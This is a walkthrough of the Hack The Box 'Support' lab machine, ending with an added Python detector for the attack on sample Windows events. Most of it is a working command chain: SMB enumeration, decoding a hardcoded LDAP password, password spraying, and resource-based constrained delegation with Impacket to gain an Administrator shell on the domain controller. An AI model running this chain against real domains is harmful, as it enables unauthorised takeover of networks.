Port scanning
```
sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.174
```
Output:
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:32 WIB
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.023s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-17 14:32:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-07-17T14:32:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.55 seconds
```
Enumerate SMB
```
smbclient -L 10.10.11.174 --no-pass
```
Then download all files from the support-tools share.
```
smbclient '//10.10.11.174/support-tools' -N -c 'prompt OFF;recurse ON;mget *'
```
Now we extract the password from UserInfo.exe. There are two ways to get it: static analysis and dynamic analysis.
Dynamic Analysis
Run UserInfo.exe; before that, start tcpdump to check whether the app makes any network requests.
```
mono UserInfo.exe find -first ''
```
Check the tcpdump output.
After confirming that UserInfo.exe connects to the server, analyze the traffic with Wireshark.
Got credentials:
```
support\ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```
Static Analysis
Use AvaloniaILSpy to decompile the program.
We find the encoded password and the XOR key. Use a Python script to decode the password.
```python
#!/usr/bin/env python3
import base64

def get_password():
    # Base64 blob and XOR key recovered from the decompiled UserInfo.exe
    encoded_string = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
    key = b"armando"
    array = base64.b64decode(encoded_string)
    array2 = bytearray(array)
    # Each byte is XORed with the repeating key and the constant 0xDF
    for i in range(len(array)):
        array2[i] = array[i] ^ key[i % len(key)] ^ 0xDF
    return array2.decode("utf-8")

password = get_password()
print(password)
```
LDAP Enumeration
Enumerate all information using ldapsearch.
Query all usernames:
```
ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
    -b 'DC=support,DC=htb' "(objectClass=person)" | \
    grep "sAMAccountName:" | sed 's/sAMAccountName: //g'
```
Query all distinguished names:
```
ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb' "(objectClass=person)" | grep "dn:"
```
Enumerate all attributes of the support user's DN:
```
ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb"
```
We find a credential in the support user's info attribute.
Found creds:
```
Ironside47pleasure40Watchful
```
Next, spray the password against the other accounts.
```
crackmapexec winrm 10.10.11.174 -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success
```
Get Low User
```
evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful
```
Privilege Escalation
After googling, I found useful articles here:
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
First, we add a computer account to the domain with Impacket.
```
impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'ayanami' -computer-pass 'ayanami'
```
Then import PowerView on the target system and confirm the new computer object exists.
```powershell
Import-Module .\PowerView.ps1
Get-DomainComputer
Get-DomainComputer ayanami
```
Now read, then write, the DC's rbcd attribute:
```
impacket-rbcd -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'read' 'support.htb/support:Ironside47pleasure40Watchful'
impacket-rbcd -delegate-from 'ayanami$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
```
Now obtain a service ticket for Administrator via the delegation:
```
impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/ayanami$:ayanami'
```
Get a shell as Administrator.
```
KRB5CCNAME=administrator.ccache impacket-psexec -dc-ip 10.10.11.174 -no-pass -k support.htb/administrator@dc.support.htb
```
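As an added defensive example (not part of the original writeup), the following Python flags the chain above in Windows Security events: a computer account created (event 4741) by a user who shortly afterwards writes the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (event 5136), which is the attribute impacket-rbcd modifies. The event records are constructed samples, and the event IDs and field names are standard Windows audit fields assumed here rather than taken from the page.

```python
#!/usr/bin/env python3
"""Correlate Windows Security events that match the RBCD chain above:
a computer account creation (4741) followed, by the same subject, by a
write to msDS-AllowedToActOnBehalfOfOtherIdentity on a DC (5136)."""
from datetime import datetime

# Constructed sample events, not real logs. Field names follow the
# SubjectUserName / ObjectDN / AttributeLDAPDisplayName audit fields.
SAMPLE_EVENTS = [
    {"time": "2023-07-17T14:40:01", "id": 4741, "subject": "support",
     "object": "CN=ayanami,CN=Computers,DC=support,DC=htb"},
    {"time": "2023-07-17T14:41:30", "id": 5136, "subject": "support",
     "object": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "attr": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    # Benign noise: an unrelated provisioning account creating a workstation
    {"time": "2023-07-17T09:00:00", "id": 4741, "subject": "prov_svc",
     "object": "CN=WS01,CN=Computers,DC=support,DC=htb"},
]

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"


def find_rbcd_chain(events, window_seconds=3600):
    """Return (subject, created_object, target_dn) for every subject that
    created a computer account and, within window_seconds afterwards,
    wrote the RBCD attribute on some object."""
    creations = [e for e in events if e["id"] == 4741]
    hits = []
    for e in events:
        if e["id"] != 5136 or e.get("attr", "").lower() != RBCD_ATTR:
            continue
        written_at = datetime.fromisoformat(e["time"])
        for c in creations:
            created_at = datetime.fromisoformat(c["time"])
            delta = (written_at - created_at).total_seconds()
            if c["subject"] == e["subject"] and 0 <= delta <= window_seconds:
                hits.append((e["subject"], c["object"], e["object"]))
    return hits


if __name__ == "__main__":
    for subject, created, target in find_rbcd_chain(SAMPLE_EVENTS):
        print(f"RBCD chain by {subject}: created {created}, then set RBCD on {target}")
```

A 5136 write to this attribute on a domain controller object by any account outside a known provisioning process is worth alerting on by itself; the correlation with 4741 only adds confidence.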
Tools Used
Tools used on this machine: